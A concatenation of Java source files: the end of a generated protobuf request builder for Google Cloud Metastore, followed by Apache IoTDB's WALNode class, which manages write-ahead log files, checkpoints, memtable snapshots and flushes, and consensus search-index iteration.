(com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The locationUri to set. * @return This builder for chaining. 
*/ public Builder setLocationUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } locationUri_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearLocationUri() { locationUri_ = getDefaultInstance().getLocationUri(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes for locationUri to set. * @return This builder for chaining. */ public Builder setLocationUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); locationUri_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) } // @@protoc_insertion_point(class_scope:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) private static final com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest(); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final 
com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> PARSER = new com.google.protobuf.AbstractParser<AlterMetadataResourceLocationRequest>() { @java.lang.Override public AlterMetadataResourceLocationRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/iotdb
35,952
iotdb-core/datanode/src/main/java/org/apache/iotdb/db/storageengine/dataregion/wal/node/WALNode.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iotdb.db.storageengine.dataregion.wal.node; import org.apache.iotdb.commons.consensus.DataRegionId; import org.apache.iotdb.commons.file.SystemFileFactory; import org.apache.iotdb.commons.utils.TestOnly; import org.apache.iotdb.consensus.common.request.IConsensusRequest; import org.apache.iotdb.consensus.common.request.IndexedConsensusRequest; import org.apache.iotdb.consensus.common.request.IoTConsensusRequest; import org.apache.iotdb.db.conf.IoTDBConfig; import org.apache.iotdb.db.conf.IoTDBDescriptor; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.PlanNodeType; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.ContinuousSameSearchIndexSeparatorNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.DeleteDataNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertRowNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertRowsNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertTabletNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.RelationalDeleteDataNode; import org.apache.iotdb.db.service.metrics.WritingMetrics; import 
org.apache.iotdb.db.storageengine.StorageEngine; import org.apache.iotdb.db.storageengine.dataregion.DataRegion; import org.apache.iotdb.db.storageengine.dataregion.flush.FlushStatus; import org.apache.iotdb.db.storageengine.dataregion.memtable.IMemTable; import org.apache.iotdb.db.storageengine.dataregion.wal.WALManager; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.IWALBuffer; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALBuffer; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALEntryType; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALInfoEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALSignalEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.Checkpoint; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.CheckpointManager; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.CheckpointType; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.MemTableInfo; import org.apache.iotdb.db.storageengine.dataregion.wal.io.WALByteBufReader; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.WALFileStatus; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.WALFileUtils; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.AbstractResultListener; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.AbstractResultListener.Status; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.WALFlushListener; import org.apache.tsfile.fileSystem.FSFactoryProducer; import org.apache.tsfile.utils.TsFileUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileNotFoundException; import java.io.IOException; import java.nio.ByteBuffer; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import 
java.util.LinkedList; import java.util.List; import java.util.ListIterator; import java.util.Map; import java.util.NoSuchElementException; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import java.util.stream.Collectors; /** * This class encapsulates {@link IWALBuffer} and {@link CheckpointManager}. If search is enabled, * the order of search index should be protected by the upper layer, and the value should start from * 1. */ public class WALNode implements IWALNode { private static final Logger logger = LoggerFactory.getLogger(WALNode.class); private static final IoTDBConfig config = IoTDBDescriptor.getInstance().getConfig(); // no iot consensus, all insert nodes can be safely deleted public static final long DEFAULT_SAFELY_DELETED_SEARCH_INDEX = Long.MAX_VALUE; // timeout threshold when waiting for next wal entry private static final long WAIT_FOR_NEXT_WAL_ENTRY_TIMEOUT_IN_SEC = 30; private static final WritingMetrics WRITING_METRICS = WritingMetrics.getInstance(); // unique identifier of this WALNode private final String identifier; // directory to store this node's files private final File logDirectory; // wal buffer private final WALBuffer buffer; // manage checkpoints private final CheckpointManager checkpointManager; // memTable id -> memTable snapshot count // used to avoid write amplification caused by frequent snapshot private final Map<Long, Integer> memTableSnapshotCount = new ConcurrentHashMap<>(); // insert nodes whose search index are before this value can be deleted safely private volatile long safelyDeletedSearchIndex = DEFAULT_SAFELY_DELETED_SEARCH_INDEX; private volatile boolean deleted = false; public WALNode(String identifier, String logDirectory) throws IOException { this(identifier, logDirectory, 0, 0L); } public WALNode( String 
identifier, String logDirectory, long startFileVersion, long startSearchIndex) throws IOException { this.identifier = identifier; this.logDirectory = SystemFileFactory.INSTANCE.getFile(logDirectory); if (!this.logDirectory.exists() && this.logDirectory.mkdirs()) { logger.info("create folder {} for wal node-{}.", logDirectory, identifier); } this.checkpointManager = new CheckpointManager(identifier, logDirectory); this.buffer = new WALBuffer( identifier, logDirectory, checkpointManager, startFileVersion, startSearchIndex); } @Override public WALFlushListener log(long memTableId, InsertRowNode insertRowNode) { logger.debug( "WAL node-{} logs insertRowNode, the search index is {}.", identifier, insertRowNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertRowNode); return log(walEntry); } @Override public WALFlushListener log(long memTableId, InsertRowsNode insertRowsNode) { logger.debug( "WAL node-{} logs insertRowsNode, the search index is {}.", identifier, insertRowsNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertRowsNode); return log(walEntry); } @Override public WALFlushListener log( long memTableId, InsertTabletNode insertTabletNode, List<int[]> rangeList) { logger.debug( "WAL node-{} logs insertTabletNode, the search index is {}.", identifier, insertTabletNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertTabletNode, rangeList); return log(walEntry); } @Override public WALFlushListener log(long memTableId, DeleteDataNode deleteDataNode) { logger.debug( "WAL node-{} logs deleteDataNode, the search index is {}.", identifier, deleteDataNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, deleteDataNode); return log(walEntry); } @Override public WALFlushListener log(long memTableId, RelationalDeleteDataNode deleteDataNode) { if (logger.isDebugEnabled()) { logger.debug( "WAL node-{} logs relationalDeleteDataNode, the search index is {}.", identifier, 
deleteDataNode.getSearchIndex()); } WALEntry walEntry = new WALInfoEntry(memTableId, deleteDataNode); return log(walEntry); } @Override public WALFlushListener log( long memTableId, ContinuousSameSearchIndexSeparatorNode separatorNode) { WALEntry walEntry = new WALInfoEntry(memTableId, separatorNode); return log(walEntry); } private WALFlushListener log(WALEntry walEntry) { buffer.write(walEntry); // set handler for pipe return walEntry.getWalFlushListener(); } @Override public void onMemTableFlushStarted(IMemTable memTable) { // do nothing } @Override public void onMemTableFlushed(IMemTable memTable) { if (memTable.isSignalMemTable()) { return; } MemTableInfo memTableInfo = new MemTableInfo(memTable, null, -1); Checkpoint checkpoint = new Checkpoint(CheckpointType.FLUSH_MEMORY_TABLE, Collections.singletonList(memTableInfo)); buffer.write(new WALInfoEntry(memTable.getMemTableId(), checkpoint)); // remove snapshot info memTableSnapshotCount.remove(memTable.getMemTableId()); } @Override public void onMemTableCreated(IMemTable memTable, String targetTsFile) { if (memTable.isSignalMemTable()) { return; } // use current log version id as first file version id long firstFileVersionId = buffer.getCurrentWALFileVersion(); MemTableInfo memTableInfo = new MemTableInfo(memTable, targetTsFile, firstFileVersionId); checkpointManager.makeCreateMemTableCPInMemory(memTableInfo); Checkpoint checkpoint = new Checkpoint(CheckpointType.CREATE_MEMORY_TABLE, Collections.singletonList(memTableInfo)); buffer.write(new WALInfoEntry(memTable.getMemTableId(), checkpoint)); } public void setDeleted(boolean deleted) { this.deleted = deleted; } // region methods for pipe // endregion // region Task to delete outdated .wal files /** Delete outdated .wal files. 
*/ public void deleteOutdatedFiles() { try { new DeleteOutdatedFileTask().run(); } catch (Exception e) { logger.error("Fail to delete wal node-{}'s outdated files.", identifier, e); } } private class DeleteOutdatedFileTask implements Runnable { private File[] sortedWalFilesExcludingLast; private List<MemTableInfo> activeOrPinnedMemTables; private static final int MAX_RECURSION_TIME = 5; // the effective information ratio private double effectiveInfoRatio = 1.0d; private int fileIndexAfterFilterSafelyDeleteIndex = Integer.MAX_VALUE; private List<Long> successfullyDeleted; private long deleteFileSize; private int recursionTime = 0; public DeleteOutdatedFileTask() { // Do nothing } private boolean initAndCheckIfNeedContinue() { rollWalFileIfHaveNoActiveMemTable(); File[] allWalFilesOfOneNode = WALFileUtils.listAllWALFiles(logDirectory); if (allWalFilesOfOneNode == null || allWalFilesOfOneNode.length <= 1) { if (logger.isDebugEnabled()) { logger.debug( "wal node-{}:no wal file or wal file number less than or equal to one was found", identifier); } return false; } WALFileUtils.ascSortByVersionId(allWalFilesOfOneNode); this.sortedWalFilesExcludingLast = Arrays.copyOfRange(allWalFilesOfOneNode, 0, allWalFilesOfOneNode.length - 1); this.activeOrPinnedMemTables = checkpointManager.activeOrPinnedMemTables(); this.fileIndexAfterFilterSafelyDeleteIndex = initFileIndexAfterFilterSafelyDeleteIndex(); this.successfullyDeleted = new ArrayList<>(); this.deleteFileSize = 0; return true; } /** * This means that the relevant memTable in the file has been successfully flushed, so we should * scroll through a new wal file so that the current file can be deleted */ public void rollWalFileIfHaveNoActiveMemTable() { long firstVersionId = checkpointManager.getFirstValidWALVersionId(); if (firstVersionId == Long.MIN_VALUE) { // roll wal log writer to delete current wal file if (buffer.getCurrentWALOriginalFileSize() > 0) { rollWALFile(); } } } @Override public void run() { // The intent of 
the loop execution here is to try to get as many memTable flush or snapshot // as possible when the valid information ratio is less than the configured value. while (recursionTime < MAX_RECURSION_TIME) { // init delete outdated file task fields, if the number of wal files is less than one, the // subsequent logic is not executed if (!initAndCheckIfNeedContinue()) { break; } // delete outdated WAL files and record which delete successfully and which delete failed. deleteOutdatedFilesAndUpdateMetric(); // summary the execution result and output a log summarizeExecuteResult(); // update current effective info ration updateEffectiveInfoRationAndUpdateMetric(); // decide whether to snapshot or flush based on the effective info ration and throttle // threshold if (trySnapshotOrFlushMemTable() && safelyDeletedSearchIndex != DEFAULT_SAFELY_DELETED_SEARCH_INDEX) { return; } recursionTime++; } } private void updateEffectiveInfoRationAndUpdateMetric() { // calculate effective information ratio long costOfActiveMemTables = checkpointManager.getTotalCostOfActiveMemTables(); MemTableInfo oldestUnpinnedMemTableInfo = checkpointManager.getOldestMemTableInfo(); long avgFileSize = getFileNum() != 0 ? getDiskUsage() / getFileNum() : config.getWalFileSizeThresholdInByte(); long totalCost = oldestUnpinnedMemTableInfo == null ? 
costOfActiveMemTables : (getCurrentWALFileVersion() - oldestUnpinnedMemTableInfo.getFirstFileVersionId()) * avgFileSize; if (costOfActiveMemTables == 0 || totalCost == 0) { effectiveInfoRatio = 1.0d; return; } effectiveInfoRatio = (double) costOfActiveMemTables / totalCost; logger.debug( "Effective information ratio is {}, active memTables cost is {}, total cost is {}", effectiveInfoRatio, costOfActiveMemTables, totalCost); WRITING_METRICS.recordWALNodeEffectiveInfoRatio(identifier, effectiveInfoRatio); } private void summarizeExecuteResult() { logger.debug( "Successfully delete {} outdated wal files for wal node-{}", successfullyDeleted.size(), identifier); } /** Delete obsolete wal files while recording which succeeded or failed */ private void deleteOutdatedFilesAndUpdateMetric() { for (int fileArrIdx = 0; fileArrIdx < sortedWalFilesExcludingLast.length; ++fileArrIdx) { File currentWal = sortedWalFilesExcludingLast[fileArrIdx]; WALFileStatus walFileStatus = WALFileUtils.parseStatusCode(currentWal.getName()); long versionId = WALFileUtils.parseVersionId(currentWal.getName()); if (canDeleteFile(fileArrIdx, walFileStatus, versionId)) { long fileSize = currentWal.length(); if (currentWal.delete()) { deleteFileSize += fileSize; buffer.removeMemTableIdsOfWal(versionId); successfullyDeleted.add(versionId); } else { logger.info( "Fail to delete outdated wal file {} of wal node-{}.", currentWal, identifier); } } } buffer.subtractDiskUsage(deleteFileSize); buffer.subtractFileNum(successfullyDeleted.size()); } private int initFileIndexAfterFilterSafelyDeleteIndex() { return safelyDeletedSearchIndex == DEFAULT_SAFELY_DELETED_SEARCH_INDEX ? sortedWalFilesExcludingLast.length : WALFileUtils.binarySearchFileBySearchIndex( sortedWalFilesExcludingLast, safelyDeletedSearchIndex + 1); } /** Return true iff effective information ratio is too small or disk usage is too large. 
*/ private boolean shouldSnapshotOrFlush() { return effectiveInfoRatio < config.getWalMinEffectiveInfoRatio() || WALManager.getInstance().shouldThrottle(); } /** * Snapshot or flush one memTable. * * @return true if snapshot or flush is executed successfully */ private boolean trySnapshotOrFlushMemTable() { if (!shouldSnapshotOrFlush()) { return false; } // find oldest memTable MemTableInfo oldestMemTableInfo = checkpointManager.getOldestMemTableInfo(); if (oldestMemTableInfo == null) { return false; } IMemTable oldestMemTable = oldestMemTableInfo.getMemTable(); if (oldestMemTable == null) { return false; } // get memTable's virtual database processor File oldestTsFile = FSFactoryProducer.getFSFactory().getFile(oldestMemTableInfo.getTsFilePath()); DataRegion dataRegion; try { dataRegion = StorageEngine.getInstance() .getDataRegion(new DataRegionId(TsFileUtils.getDataRegionId(oldestTsFile))); } catch (Exception e) { logger.error("Fail to get data region processor for {}", oldestTsFile, e); return false; } if (dataRegion == null) { return false; } // snapshot or flush memTable, flush memTable when it belongs to an old time partition, or // it's snapshot count or size reach threshold. 
int snapshotCount = memTableSnapshotCount.getOrDefault(oldestMemTable.getMemTableId(), 0); long oldestMemTableTVListsRamCost = oldestMemTable.getTVListsRamCost(); if (TsFileUtils.getTimePartition(new File(oldestMemTableInfo.getTsFilePath())) < dataRegion.getLatestTimePartition() || snapshotCount >= config.getMaxWalMemTableSnapshotNum() || oldestMemTableTVListsRamCost > config.getWalMemTableSnapshotThreshold()) { flushMemTable(dataRegion, oldestTsFile, oldestMemTable); WRITING_METRICS.recordWalFlushMemTableCount(1); WRITING_METRICS.recordMemTableRamWhenCauseFlush(identifier, oldestMemTableTVListsRamCost); } else { snapshotMemTable(dataRegion, oldestTsFile, oldestMemTableInfo); } return true; } private void flushMemTable(DataRegion dataRegion, File tsFile, IMemTable memTable) { boolean submitted = true; if (memTable.getFlushStatus() == FlushStatus.WORKING) { submitted = dataRegion.submitAFlushTask( TsFileUtils.getTimePartition(tsFile), TsFileUtils.isSequence(tsFile), memTable); logger.info( "WAL node-{} flushes memTable-{} to TsFile {} because Effective information ratio {} is below wal min effective info ratio {}, memTable size is {}.", identifier, memTable.getMemTableId(), tsFile, String.format("%.4f", effectiveInfoRatio), config.getWalMinEffectiveInfoRatio(), memTable.getTVListsRamCost()); } // it's fine to wait until memTable has been flushed, because deleting files is not urgent. 
if (submitted || memTable.getFlushStatus() == FlushStatus.FLUSHING) { long sleepTime = 0; while (memTable.getFlushStatus() != FlushStatus.FLUSHED) { try { Thread.sleep(1_000); sleepTime += 1_000; if (sleepTime > 10_000) { logger.warn("Waiting too long for memTable flush to be done."); break; } } catch (InterruptedException e) { logger.warn("Interrupted when waiting for memTable flush to be done."); Thread.currentThread().interrupt(); } } } } // synchronize memTable to make sure snapshot is made before memTable flush operation @SuppressWarnings("java:S2445") private void snapshotMemTable(DataRegion dataRegion, File tsFile, MemTableInfo memTableInfo) { IMemTable memTable = memTableInfo.getMemTable(); // get dataRegion write lock to make sure no more writes to the memTable dataRegion.writeLock( "CheckpointManager$DeleteOutdatedFileTask.snapshotOrFlushOldestMemTable"); try { // make sure snapshot is made before memTable flush operation synchronized (memTableInfo) { if (memTable == null || memTable.getFlushStatus() != FlushStatus.WORKING) { return; } // update snapshot count memTableSnapshotCount.compute(memTable.getMemTableId(), (k, v) -> v == null ? 
1 : v + 1); // roll wal log writer to make sure first version id will be updated WALEntry rollWALFileSignal = new WALSignalEntry(WALEntryType.ROLL_WAL_LOG_WRITER_SIGNAL, true); WALFlushListener fileRolledListener = log(rollWALFileSignal); if (fileRolledListener.waitForResult() == Status.FAILURE) { logger.error("Fail to roll wal log writer.", fileRolledListener.getCause()); return; } // update first version id first to make sure snapshot is in the files ≥ current log // version memTableInfo.setFirstFileVersionId(buffer.getCurrentWALFileVersion()); // log snapshot in a new .wal file WALEntry walEntry = new WALInfoEntry(memTable.getMemTableId(), memTable, true); WALFlushListener flushListener = log(walEntry); // wait until getting the result // it's low-risk to block writes awhile because this memTable accumulates slowly if (flushListener.waitForResult() == Status.FAILURE) { logger.error("Fail to snapshot memTable of {}", tsFile, flushListener.getCause()); return; } logger.info( "WAL node-{} snapshots memTable-{} to wal files because Effective information ratio {} is below wal min effective info ratio {}, memTable size is {}.", identifier, memTable.getMemTableId(), String.format("%.4f", effectiveInfoRatio), config.getWalMinEffectiveInfoRatio(), memTable.getTVListsRamCost()); WRITING_METRICS.recordMemTableRamWhenCauseSnapshot( identifier, memTable.getTVListsRamCost()); } } finally { dataRegion.writeUnlock(); } } public boolean isContainsActiveOrPinnedMemTable(Long versionId) { Set<Long> memTableIdsOfCurrentWal = buffer.getMemTableIds(versionId); // If this set is empty, there is a case where WalEntry has been logged but not persisted, // because WalEntry is persisted asynchronously. 
In this case, the file cannot be deleted // directly, so it is considered active if (memTableIdsOfCurrentWal == null) { return true; } return !Collections.disjoint( activeOrPinnedMemTables.stream() .map(MemTableInfo::getMemTableId) .collect(Collectors.toSet()), memTableIdsOfCurrentWal); } private boolean canDeleteFile(long fileArrIdx, WALFileStatus walFileStatus, long versionId) { return (fileArrIdx < fileIndexAfterFilterSafelyDeleteIndex || walFileStatus == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) && !isContainsActiveOrPinnedMemTable(versionId); } } // endregion // region Search interfaces for consensus group @Override public void setSafelyDeletedSearchIndex(long safelyDeletedSearchIndex) { this.safelyDeletedSearchIndex = safelyDeletedSearchIndex; } /** This iterator is not concurrency-safe, cannot read the current-writing wal file. */ @Override public ReqIterator getReqIterator(long startIndex) { return new PlanNodeIterator(startIndex); } private class PlanNodeIterator implements ReqIterator { /** search index of next element */ private long nextSearchIndex; /** files to search */ private File[] filesToSearch = null; /** index of current searching file in the filesToSearch */ private int currentFileIndex = -1; /** true means filesToSearch and currentFileIndex are outdated, call updateFilesToSearch */ private boolean needUpdatingFilesToSearch = true; /** batch store insert nodes */ private final LinkedList<IndexedConsensusRequest> insertNodes = new LinkedList<>(); /** iterator of insertNodes */ private ListIterator<IndexedConsensusRequest> itr = null; /** last broken wal file's version id */ private long brokenFileId = -1; public PlanNodeIterator(long startIndex) { this.nextSearchIndex = startIndex; } @Override public boolean hasNext() { if (itr != null && itr.hasNext()) { return true; } // clear outdated iterator insertNodes.clear(); itr = null; if (filesToSearch == null || currentFileIndex >= filesToSearch.length - 1) { needUpdatingFilesToSearch = true; } // 
update files to search if (needUpdatingFilesToSearch) { updateFilesToSearch(); if (needUpdatingFilesToSearch) { logger.debug( "update file to search failed, the next search index is {}", nextSearchIndex); return false; } } // find file contains search index while (WALFileUtils.parseStatusCode(filesToSearch[currentFileIndex].getName()) == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) { currentFileIndex++; if (currentFileIndex >= filesToSearch.length - 1) { needUpdatingFilesToSearch = true; return false; } } /* ------ find all nodes from all wal file ------ */ AtomicReference<List<IConsensusRequest>> tmpNodes = new AtomicReference<>(new ArrayList<>()); AtomicBoolean notFirstFile = new AtomicBoolean(false); AtomicBoolean hasCollectedSufficientData = new AtomicBoolean(false); // try to collect current tmpNodes to insertNodes, return true if successfully collect an // insert node Runnable tryToCollectInsertNodeAndBumpIndex = () -> { if (!tmpNodes.get().isEmpty()) { insertNodes.add(new IndexedConsensusRequest(nextSearchIndex, tmpNodes.get())); tmpNodes.set(new ArrayList<>()); nextSearchIndex++; if (notFirstFile.get()) { hasCollectedSufficientData.set(true); } } }; COLLECT_FILE_LOOP: for (; currentFileIndex < filesToSearch.length - 1; currentFileIndex++) { // cannot find any in this file, so all slices of last plan node are found if (WALFileUtils.parseStatusCode(filesToSearch[currentFileIndex].getName()) == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) { tryToCollectInsertNodeAndBumpIndex.run(); continue; } try (WALByteBufReader walByteBufReader = new WALByteBufReader(filesToSearch[currentFileIndex])) { while (walByteBufReader.hasNext()) { ByteBuffer buffer = walByteBufReader.next(); WALEntryType type = WALEntryType.valueOf(buffer.get()); if (type.needSearch()) { // see WALInfoEntry#serialize, entry type + memtable id + plan node type buffer.position(WALInfoEntry.FIXED_SERIALIZED_SIZE + PlanNodeType.BYTES); final long currentWalEntryIndex = buffer.getLong(); buffer.clear(); if 
(currentWalEntryIndex == -1) { // WAL entry of targetIndex has been fully collected, so put them into insertNodes tryToCollectInsertNodeAndBumpIndex.run(); } else if (currentWalEntryIndex < nextSearchIndex) { // WAL entry is outdated, do nothing, continue to see next WAL entry } else if (currentWalEntryIndex == nextSearchIndex) { tmpNodes.get().add(new IoTConsensusRequest(buffer)); } else { // currentWalEntryIndex > targetIndex // WAL entry of targetIndex has been fully collected, put them into insertNodes tryToCollectInsertNodeAndBumpIndex.run(); if (currentWalEntryIndex != nextSearchIndex) { logger.warn( "The search index of next WAL entry should be {}, but actually it's {}", nextSearchIndex, currentWalEntryIndex); nextSearchIndex = currentWalEntryIndex; } tmpNodes.get().add(new IoTConsensusRequest(buffer)); } } else { tryToCollectInsertNodeAndBumpIndex.run(); } if (hasCollectedSufficientData.get()) { break COLLECT_FILE_LOOP; } } } catch (Exception e) { brokenFileId = WALFileUtils.parseVersionId(filesToSearch[currentFileIndex].getName()); logger.error( "Fail to read wal from wal file {}, skip this file.", filesToSearch[currentFileIndex], e); } notFirstFile.set(true); } // update file index and version id if (currentFileIndex >= filesToSearch.length - 1) { needUpdatingFilesToSearch = true; } // update iterator if (!insertNodes.isEmpty()) { itr = insertNodes.listIterator(); return true; } return false; } @Override public IndexedConsensusRequest next() { if (itr == null && !hasNext()) { throw new NoSuchElementException(); } IndexedConsensusRequest request = itr.next(); nextSearchIndex = request.getSearchIndex() + 1; return request; } @Override public void waitForNextReady() throws InterruptedException { boolean walFileRolled = false; long bufferLastSearchIndex = 0; while (!hasNext()) { if (!walFileRolled) { boolean timeout = !buffer.waitForFlush(WAIT_FOR_NEXT_WAL_ENTRY_TIMEOUT_IN_SEC, TimeUnit.SECONDS); if (timeout) { bufferLastSearchIndex = 
buffer.getCurrentSearchIndex(); logger.info( "timeout when waiting for next WAL entry ready, execute rollWALFile. Current search index in wal buffer is {}, and next target index is {}", bufferLastSearchIndex, nextSearchIndex); rollWALFile(); walFileRolled = true; } } else { // only wait when the search index of the buffer remains the same as the previous check long finalBufferLastSearchIndex = bufferLastSearchIndex; buffer.waitForFlush(buf -> buf.getCurrentSearchIndex() == finalBufferLastSearchIndex); } } } @Override public void waitForNextReady(long time, TimeUnit unit) throws InterruptedException, TimeoutException { if (!hasNext()) { boolean timeout = !buffer.waitForFlush(time, unit); if (timeout || !hasNext()) { throw new TimeoutException(); } } } @Override public void skipTo(long targetIndex) { if (targetIndex < nextSearchIndex) { logger.warn( "Skip from {} to {}, it's a dangerous operation because insert plan {} may have been lost.", nextSearchIndex, targetIndex, targetIndex); } if (itr != null && itr.hasNext() && insertNodes.get(itr.nextIndex()).getSearchIndex() <= targetIndex && targetIndex <= insertNodes.getLast().getSearchIndex()) { while (itr.hasNext()) { IndexedConsensusRequest request = itr.next(); if (targetIndex == request.getSearchIndex()) { itr.previous(); nextSearchIndex = targetIndex; return; } } } reset(); nextSearchIndex = targetIndex; } /** Reset all params except nextSearchIndex */ private void reset() { insertNodes.clear(); itr = null; filesToSearch = null; currentFileIndex = -1; brokenFileId = -1; needUpdatingFilesToSearch = true; } private void updateFilesToSearch() { File[] filesToSearch = WALFileUtils.listAllWALFiles(logDirectory); WALFileUtils.ascSortByVersionId(filesToSearch); int fileIndex = WALFileUtils.binarySearchFileBySearchIndex(filesToSearch, nextSearchIndex); logger.debug( "searchIndex: {}, result: {}, files: {}, ", nextSearchIndex, fileIndex, filesToSearch); // (xingtanzjr) When the target entry does not exist, the reader will 
return minimum one whose // searchIndex is larger than target searchIndex if (fileIndex == -1) { fileIndex = 0; } // skip broken files while (fileIndex < filesToSearch.length - 1 && WALFileUtils.parseVersionId(filesToSearch[fileIndex].getName()) <= brokenFileId) { fileIndex++; } if (filesToSearch != null && (fileIndex >= 0 && fileIndex < filesToSearch.length - 1)) { // possible to find next this.filesToSearch = filesToSearch; this.currentFileIndex = fileIndex; this.needUpdatingFilesToSearch = false; } else { // impossible to find next this.filesToSearch = null; this.currentFileIndex = -1; this.needUpdatingFilesToSearch = true; } } } @Override public long getCurrentSearchIndex() { return buffer.getCurrentSearchIndex(); } @Override public long getCurrentWALFileVersion() { return buffer.getCurrentWALFileVersion(); } @Override public long getTotalSize() { return WALManager.getInstance().getTotalDiskUsage(); } // endregion @Override public void close() { buffer.close(); } public String getIdentifier() { return identifier; } public File getLogDirectory() { return logDirectory; } /** Get the .wal file starts with the specified version id */ public File getWALFile(long versionId) throws FileNotFoundException { return WALFileUtils.getWALFile(logDirectory, versionId); } /** Return true when all wal entries all consumed and flushed */ public boolean isAllWALEntriesConsumed() { return buffer.isAllWALEntriesConsumed(); } /** Roll wal file */ public void rollWALFile() { WALEntry rollWALFileSignal = new WALSignalEntry(WALEntryType.ROLL_WAL_LOG_WRITER_SIGNAL, true); WALFlushListener walFlushListener = log(rollWALFileSignal); if (!deleted && walFlushListener.waitForResult() == AbstractResultListener.Status.FAILURE) { logger.error( "Fail to trigger rolling wal node-{}'s wal file log writer.", identifier, walFlushListener.getCause()); } } public long getDiskUsage() { return buffer.getDiskUsage(); } public long getFileNum() { return buffer.getFileNum(); } public int getRegionId(long 
memtableId) { return checkpointManager.getRegionId(memtableId); } @TestOnly long getCurrentLogVersion() { return buffer.getCurrentWALFileVersion(); } @TestOnly CheckpointManager getCheckpointManager() { return checkpointManager; } @TestOnly public void setBufferSize(int size) { buffer.setBufferSize(size); } @TestOnly public WALBuffer getWALBuffer() { return buffer; } }
openjdk/jdk8
35,821
jdk/test/java/text/Format/DecimalFormat/RoundingAndPropertyTest.java
